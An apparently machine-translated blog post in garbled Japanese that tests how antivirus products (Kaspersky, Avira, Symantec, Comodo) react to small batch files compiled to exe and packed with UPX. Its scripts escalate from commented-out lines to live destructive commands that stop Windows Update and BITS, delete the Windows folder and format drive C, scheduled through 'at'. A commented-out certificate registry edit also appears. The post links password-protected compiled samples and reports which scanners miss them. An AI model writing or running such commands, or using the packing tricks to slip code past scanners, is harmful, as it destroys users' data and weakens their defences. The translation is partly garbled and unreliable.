誰かが私に面白いと思われるレビューをくれたといいのですが。 続けましょう! 今日、私は長い間何を書くべきか考えました。 Kaspersky Labでの小さなresりを除いて、アイデアはありませんでしたが、これはもはや重要ではなく、ほとんど個人的に親密です。
それで、今日、私は主要な性的特徴のためにいくつかのアンチウイルスの発見的手法をひきたいです。 あなたはこれを自宅で試すことができます! ;)それが通常起こるように、結果は驚くべきものでした。
必要なもの:
1.メモ帳(メモ帳)。
2.クイックバッチコンパイラ。
3. UPX。
したがって、このbatファイルを作成します。
md "%temp%\123456"
echo rem reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates\F190D1C02C9AF8AB7AA6973C918A4E0836BDE847 /v Blob /t REG_BINARY /d 00 > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"
この特定のレジストリ設定を選択した理由-謎のままにしましょう。 私はこれを言います:強調はカスペルスキーにありました。 グーグルのシーカーは見つけるでしょう:)
exeでQuick Batch Compilerを使用してコンパイルすると同時に、upx.exeファイルにゴミをファイルにパックし、upxをパックします。
それでは、ベンダーがダミーと考えるものを見てみましょう。 私は誰もがファイルのレムに気づき、彼がダミーであることを疑っていないことを願っていますか? 予想どおり- 呪われたのはAviraだけでしたが、その後は彼女の精神で。 キャスパーは期待に応えられず、見栄えがよかった 。
タスクを複雑にします。
md "%temp%\123456"
echo rem net stop wuauserv > "%temp%\123456\1.bat"
echo rem net start wuauserv > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"
Simantekから追加の「ウーフ」をすぐに取得します 。
私たちは成長し始めます-レムは消えますが、サービスはすべて同じだけです:
md "%temp%\123456"
echo net stop wuauserv > "%temp%\123456\1.bat"
echo net start wuauserv > "%temp%\123456\1.bat"
echo net stop BITS > "%temp%\123456\1.bat"
echo net start BITS > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"
しかし、アンチウイルスはこの点でまったく無関心です- 状況は同じです。
サービスを停止し、マシンに穴を開ける可能性があります。
md "%temp%\123456"
echo net stop wuauserv > "%temp%\123456\1.bat"
echo net stop BITS > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"
アンチウイルスは気にしません 。
冗談はさておき、冗談はさておき:
md "%temp%\123456"
echo net stop wuauserv > "%temp%\123456\1.bat"
echo net stop BITS > "%temp%\123456\1.bat"
echo rd %windir% /s /q > "%temp%\123456\1.bat"
echo format c: > "%temp%\123456\1.bat"
at 23:00 "%temp%\123456\1.bat"
このようなもののコンパイル済みファイルはここにあります ( ウイルスのパスワード)。
そして今おもしろいこと:私のローカルCIS 2010はこのアラートを発行しました:
ただし、 カスペルスキーはモルドバのパルチザンのようにBTで沈黙していますが、最も興味深いのは他のウイルス対策ソフトウェアに関するものです:いくつかの検出でさえ、ヒューリスティックではなくシグネチャベースに基づいています(ヒュール、ジェネ、疑わしいなど)。
危険なコード( ここではコンパイルされたファイル、パスワードは同じです)を雇う価値があります:カスペルスキーはすでに沈黙しています(名誉と称賛!
しかし、Kasperskyを使用してファイルスキャンと駆除を実行すると、さらに興味深いものになります。 最初に、スキャナーからの検出と常駐からの検出の2つがありました。 それから、1つのキャンプから「タイタンの戦い」を始めます。 その結果、次のことがわかります。
(うーん、タスクを削除し、サービスを開始し、ファイルを削除するには再起動が必要ですか?
(380なぜですか?円の程度?それとも私のバットファイルの怖いキャラクター?)
(私たちは健康かどうか???)
しかし、最終的にはすべてが終了し、心の底からCIS 2010は積極的な脅威はないと報告しています。 危険が過ぎました! ;)
自分で決めた合計。
1.ヒュール、ジェン、疑わしいなどを検出します。 BT-これはマルウェアであるという事実からはほど遠い。 最小限のコードを見て、それが恐怖を引き起こしました。深刻なプログラムはどうなりますか?
2.カスペルスキーのヒューリスティックは、発言が何であり、アクティブなコードが何であるかを理解しています。 その他はあまりありません:)
3.アビラは、妄想に苦しんでいたため、引き続き苦しんでいます。 一方、多くのウイルスを検出します。 彼らが本当にいるよりもさらに:)
4.すべての魅力と利点を備えたKIS 2010は非常に重要な製品です。 私たちは2011年を待っています!! (希望はほとんどありませんが、私の要求に応じない方が良いです)。